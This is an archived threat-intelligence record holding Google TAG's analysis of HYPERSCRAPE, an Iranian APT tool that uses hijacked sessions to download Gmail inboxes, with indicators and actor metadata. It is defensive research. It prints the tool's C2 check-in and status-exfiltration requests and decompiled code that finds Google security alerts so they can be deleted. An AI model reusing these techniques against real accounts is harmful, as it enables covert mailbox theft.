{
	"id": "c046d39a-1059-49b0-869d-3ce40b7bdf79",
	"created_at": "2026-04-06T00:07:10.765409Z",
	"updated_at": "2026-04-10T03:34:00.59168Z",
	"deleted_at": null,
	"sha1_hash": "50f31bfb0da2c0c112f4a4117b71f09482acc35d",
	"title": "New Iranian APT data extraction tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51852,
	"plain_text": "New Iranian APT data extraction tool\r\nBy Ajax Bash\r\nPublished: 2022-08-23 · Archived: 2026-04-05 13:43:30 UTC\r\nAs part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats\r\nincluding APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users. For\r\nyears, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques\r\nto conduct espionage aligned with the interests of the Iranian government. Now, we’re shining light on a new tool of\r\ntheirs.\r\nIn December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from\r\nGmail, Yahoo!, and Microsoft Outlook accounts. The attacker runs HYPERSCRAPE on their own machine to download\r\nvictims’ inboxes using previously acquired credentials. We have seen it deployed against fewer than two dozen accounts\r\nlocated in Iran. The oldest known sample is from 2020, and the tool is still under active development. We have taken\r\nactions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.\r\nThis post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a\r\nTelegram grabber tool. HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining\r\npurpose-built capabilities. Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but\r\nrather its effectiveness in accomplishing Charming Kitten’s objectives.\r\nHYPERSCRAPE Analysis\r\nHYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker\r\nhas hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser,\r\nwhich enables the basic HTML view in Gmail. 
Once logged in, the tool changes the account’s language settings to\r\nEnglish and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking\r\nthem unread. After the program has finished downloading the inbox, it reverts the language back to its original settings\r\nand deletes any security emails from Google. Earlier versions contained the option to request data from Google Takeout,\r\na feature which allows users to export their data to a downloadable archive file.\r\nThe tool is written in .NET for Windows PCs and is designed to run on the attacker's machine. We tested\r\nHYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo!\r\nand Microsoft accounts. HYPERSCRAPE won't run unless in a directory with other file dependencies.\r\nHYPERSCRAPE file metadata\r\nHYPERSCRAPE Setup\r\nWhen launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK\" and will terminate\r\nif it's not found. In the version tested, the C2 was unobfuscated and stored as a hardcoded string. In later versions it was\r\nobfuscated with Base64.\r\nGET http://{C2}/Index.php?Ck=OK HTTP/1.1\r\nhttps://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/\r\nPage 1 of 6\n\nHost: {C2}\r\nAccept-Encoding: gzip\r\nConnection: Keep-Alive\r\nThe tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string\r\nto a valid cookie file. A new form is displayed if the information is not provided via command prompt.\r\nInitial form to specify operation parameters\r\nOnce provided, the data in the \"Identity\" field is sent to a C2 for confirmation. 
Again, the response is expected to be\r\n\"OK\".\r\nGET http://{C2}/Index.php?vubc={identity} HTTP/1.1\r\nHost: {C2}\r\nAccept-Encoding: gzip\r\nIf the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and\r\ndrop.\r\nThe cookie drag and drop form\r\nAfter parsing, the cookies are inserted into a local cache used by the embedded web browser. A new folder named\r\n\"Download\" is created adjacent to the main binary. The browser then navigates to Gmail to begin the data collection.\r\nThe user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the\r\nattacker to enable the basic HTML view in Gmail.\r\nThe error page from using an unsupported browser\r\nIf the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter\r\ncredentials to proceed, as the program will wait until it finds the inbox page.\r\nWhat HYPERSCRAPE does\r\nOnce the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English,\r\nchanging it if not. The language is returned to its original setting when the run is finished.\r\nHYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download. It does the\r\nfollowing for each email found:\r\nClicks on the email and opens it\r\nDownloads it\r\nIf the email was originally unread, marks it unread\r\nGoes back to the inbox\r\nThe emails are saved with \".eml\" extensions under the Downloads directory with the filename corresponding to the\r\nsubject. A log file is written containing a count of the emails that were downloaded.\r\nWhen finished, an HTTP POST request is made to the C2 to relay the status and system information. 
The downloaded\r\nemails are not sent to the C2.\r\nPOST http://{C2}/?Key={GUID}\u0026Crc={Identifier}\r\n{\r\n\"appName\": \"Gmail Downloader\",\r\n\"targetname\": \"{Email}\",\r\n\"HostName\": \"REDACTED\",\r\n\"srcUserIP\": \"REDACTED\",\r\n\"actionType\": \"First\",\r\n\"timeOccurrence\": \"05/01/2022 05:50:31 PM\",\r\n\"OS\": \"REDACTED\",\r\n\"OSVersion\": \"REDACTED\",\r\n\"SystemModel\": \"REDACTED\",\r\n\"SystemType\": \"REDACTED\",\r\n\"srcName\": \"REDACTED\",\r\n\"srcOrgName\": \"REDACTED\"\r\n}\r\nThe program will delete any security emails from Google generated by the attacker’s activity.\r\nprivate bool IsThereAnyEMail() {\r\nList\u003cGeckoHtmlElement\u003e list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName(\"span\")\r\nwhere x.TextContent.StartsWith(\"Security alert\") || x.TextContent.StartsWith(\"Archive of Google data requested\") ||\r\nx.TextContent.StartsWith(\"Your Google data archive is ready\") || x.TextContent.StartsWith(\"Your Google data is ready\")\r\n|| x.TextContent.StartsWith(\"Critical security alert\") || x.TextContent.StartsWith(\"Access for less secure apps has been turned on\")\r\n|| x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.StartsWith(\"Help us protect you: Security advice from Google\")\r\n|| x.TextContent.StartsWith(\"Access for less secure apps has been turned on\")\r\nselect x).ToList\u003cGeckoHtmlElement\u003e();\r\nbool flag = list.Count == 0;\r\nreturn !flag;\r\n}\r\nEarly versions contained an option to request Google Takeout data\r\nData from Google Takeout is also available upon request, but the option was only found in early builds. 
The\r\nfunctionality was not automated and it's unclear why it was removed in later versions.\r\nWhen conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to\r\nrelay the cookies and account name, both of which are required to accomplish the Takeout. When they are received, the\r\nbrowser navigates to the official Takeout link to request and eventually download the exported data.\r\npublic void ManageTakeOut() {\r\nstring text = \"PipeName\";\r\nProcess process = new Process();\r\nprocess.StartInfo.Arguments = string.Format(\"PIPE Google \\\"{0}\\\"\", text);\r\nprocess.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName;\r\nprocess.Start();\r\nPipeCommunication pipeCommunication = new PipeCommunication(true, text);\r\nbool flag = false;\r\nwhile (!flag) {\r\ntry {\r\nJsonInfo jsonInfo = pipeCommunication.Read();\r\nswitch (jsonInfo.Type) {\r\ncase JsonType.GetCookies:\r\njsonInfo.Data = this.CookieText;\r\npipeCommunication.Write(jsonInfo);\r\nbreak;\r\ncase JsonType.TakeOutFile:\r\nflag = true;\r\nbreak;\r\ncase JsonType.GetUsername:\r\nwhile (this.OperationObject.GetUsername() == null) {\r\nThread.Sleep(1000);\r\n}\r\njsonInfo.Data = this.OperationObject.GetUsername();\r\npipeCommunication.Write(jsonInfo);\r\nbreak;\r\n}\r\n} catch (Exception) {\r\nbool hasExited = process.HasExited;\r\nif (hasExited) {\r\nflag = true;\r\n}\r\n}\r\n}\r\npipeCommunication.Close();\r\n}\r\nProtecting Our Users\r\nTAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security\r\ncommunity, and for companies and individuals that may be targeted. It’s why we do things like work with our\r\nCyberCrime Investigation Group to share critical information relevant to law enforcement. 
We hope doing so will\r\nimprove understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger\r\nprotections across the industry. We’ll also continue to apply those findings internally to improve the safety and security\r\nof our products so we can effectively combat threats and protect users who rely on our services. In the meantime, we\r\nencourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level\r\nEnhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.\r\nHYPERSCRAPE Indicators\r\nC2s\r\n136.243.108.14\r\n173.209.51.54\r\nHYPERSCRAPE binaries\r\n03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369\r\n35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208\r\n5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798\r\n6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f\r\n767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4\r\n977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f\r\nac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6\r\ncd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa\r\nMicrosoft Live DLL\r\n1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23\r\nPDB\r\nE:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb\r\nE:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb\r\nSource: https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/"
	],
	"report_names": [
		"new-iranian-apt-data-extraction-tool"
	],
	"threat_actors": [
		{
			"id": "82b92285-4588-48c9-8578-bb39f903cf62",
			"created_at": "2022-10-25T15:50:23.850506Z",
			"updated_at": "2026-04-10T02:00:05.418577Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"Charming Kitten"
			],
			"source_name": "MITRE:Charming Kitten",
			"tools": [
				"DownPaper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d8af157e-741b-4933-bb4a-b78490951d97",
			"created_at": "2023-01-06T13:46:38.748929Z",
			"updated_at": "2026-04-10T02:00:03.087356Z",
			"deleted_at": null,
			"main_name": "APT35",
			"aliases": [
				"COBALT MIRAGE",
				"Agent Serpens",
				"Newscaster Team",
				"Magic Hound",
				"G0059",
				"Phosphorus",
				"Mint Sandstorm",
				"TunnelVision"
			],
			"source_name": "MISPGALAXY:APT35",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "029625d2-9734-44f9-9e10-b894b4f57f08",
			"created_at": "2023-01-06T13:46:38.364105Z",
			"updated_at": "2026-04-10T02:00:02.944092Z",
			"deleted_at": null,
			"main_name": "Charming Kitten",
			"aliases": [
				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b07fec96-80cd-4d92-aa52-a26a0b25b7c2",
			"created_at": "2022-10-25T16:07:23.826594Z",
			"updated_at": "2026-04-10T02:00:04.760416Z",
			"deleted_at": null,
			"main_name": "Madi",
			"aliases": [
				"Mahdi"
			],
			"source_name": "ETDA:Madi",
			"tools": [
				"Madi"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434030,
	"ts_updated_at": 1775792040,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.pdf",
		"text": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.txt",
		"img": "https://archive.orkl.eu/50f31bfb0da2c0c112f4a4117b71f09482acc35d.jpg"
	}
}